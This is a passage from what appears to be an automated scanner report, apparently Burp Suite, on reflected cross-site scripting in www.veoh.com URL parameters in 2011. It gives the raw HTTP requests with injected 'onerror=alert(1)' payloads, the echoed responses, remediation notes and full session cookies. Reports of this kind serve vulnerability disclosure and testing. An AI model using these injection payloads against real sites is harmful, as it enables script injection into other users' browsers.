Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=50
Content-Length: 77572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/celebrity_and_showbizfcae8"><img src=a onerror=alert(1)>26d66e628b1/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fb1e3<img%20src%3da%20onerror%3dalert(1)>01b1c12b160 was submitted in the REST URL parameter 4. This input was echoed as fb1e3<img src=a onerror=alert(1)>01b1c12b160 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/celebrity_and_showbizfb1e3<img%20src%3da%20onerror%3dalert(1)>01b1c12b160/watch/v20767641DYmkkC9T HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=9
Content-Length: 77528
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_celebrity_and_showbizfb1e3<img src=a onerror=alert(1)>01b1c12b160"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e231'%3bf41ab2e3621 was submitted in the REST URL parameter 6. This input was echoed as 3e231';f41ab2e3621 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T3e231'%3bf41ab2e3621 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=98
Content-Length: 99706
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa06e"><img%20src%3da%20onerror%3dalert(1)>7b8d668185d was submitted in the REST URL parameter 4. This input was echoed as aa06e"><img src=a onerror=alert(1)>7b8d668185d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/educational_and_howtoaa06e"><img%20src%3da%20onerror%3dalert(1)>7b8d668185d/watch/v20767155HXCcYkcJ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 78368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/educational_and_howtoaa06e"><img src=a onerror=alert(1)>7b8d668185d/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1b1b0<img%20src%3da%20onerror%3dalert(1)>1aed6fadab1 was submitted in the REST URL parameter 4. This input was echoed as 1b1b0<img src=a onerror=alert(1)>1aed6fadab1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/educational_and_howto1b1b0<img%20src%3da%20onerror%3dalert(1)>1aed6fadab1/watch/v20767155HXCcYkcJ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:45 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 78324
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_educational_and_howto1b1b0<img src=a onerror=alert(1)>1aed6fadab1"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1c2d'%3b713d1af7ffd was submitted in the REST URL parameter 6. This input was echoed as b1c2d';713d1af7ffd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJb1c2d'%3b713d1af7ffd HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:55 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=80
Content-Length: 99708
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b3fcf<img%20src%3da%20onerror%3dalert(1)>5a765c7587a was submitted in the REST URL parameter 4. This input was echoed as b3fcf<img src=a onerror=alert(1)>5a765c7587a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/entertainmentb3fcf<img%20src%3da%20onerror%3dalert(1)>5a765c7587a/watch/v20767324YkGXZzfQ HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:50 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=100 Content-Length: 76165
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_entertainmentb3fcf<img src=a onerror=alert(1)>5a765c7587a"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4e10"><img%20src%3da%20onerror%3dalert(1)>e01df9f8906 was submitted in the REST URL parameter 4. This input was echoed as b4e10"><img src=a onerror=alert(1)>e01df9f8906 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/entertainmentb4e10"><img%20src%3da%20onerror%3dalert(1)>e01df9f8906/watch/v20767324YkGXZzfQ HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:35 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=75 Content-Length: 76209
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/entertainmentb4e10"><img src=a onerror=alert(1)>e01df9f8906/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48a9e'%3b18c90b1747d was submitted in the REST URL parameter 6. This input was echoed as 48a9e';18c90b1747d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ48a9e'%3b18c90b1747d HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:39:01 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=50 Content-Length: 95042
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 36ade<img%20src%3da%20onerror%3dalert(1)>19ea89e01e1 was submitted in the REST URL parameter 4. This input was echoed as 36ade<img src=a onerror=alert(1)>19ea89e01e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/people_and_blogs36ade<img%20src%3da%20onerror%3dalert(1)>19ea89e01e1/watch/v20767178Fn5bZQJP HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:50 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=90 Content-Length: 77514
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_people_and_blogs36ade<img src=a onerror=alert(1)>19ea89e01e1"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b8b"><img%20src%3da%20onerror%3dalert(1)>fa9b9160bac was submitted in the REST URL parameter 4. This input was echoed as b9b8b"><img src=a onerror=alert(1)>fa9b9160bac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/people_and_blogsb9b8b"><img%20src%3da%20onerror%3dalert(1)>fa9b9160bac/watch/v20767178Fn5bZQJP HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:28 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=60 Content-Length: 77558
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/people_and_blogsb9b8b"><img src=a onerror=alert(1)>fa9b9160bac/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 614f9'%3be5e8b5ac5dc was submitted in the REST URL parameter 6. This input was echoed as 614f9';e5e8b5ac5dc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP614f9'%3be5e8b5ac5dc HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:39:01 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=58 Content-Length: 106431
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba32a"><img%20src%3da%20onerror%3dalert(1)>a3be2b20567 was submitted in the REST URL parameter 4. This input was echoed as ba32a"><img src=a onerror=alert(1)>a3be2b20567 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/groupsba32a"><img%20src%3da%20onerror%3dalert(1)>a3be2b20567 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4472 Date: Thu, 03 Feb 2011 21:47:01 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=51
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 254d4"><img%20src%3da%20onerror%3dalert(1)>329c969f72e was submitted in the REST URL parameter 4. This input was echoed as 254d4"><img src=a onerror=alert(1)>329c969f72e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
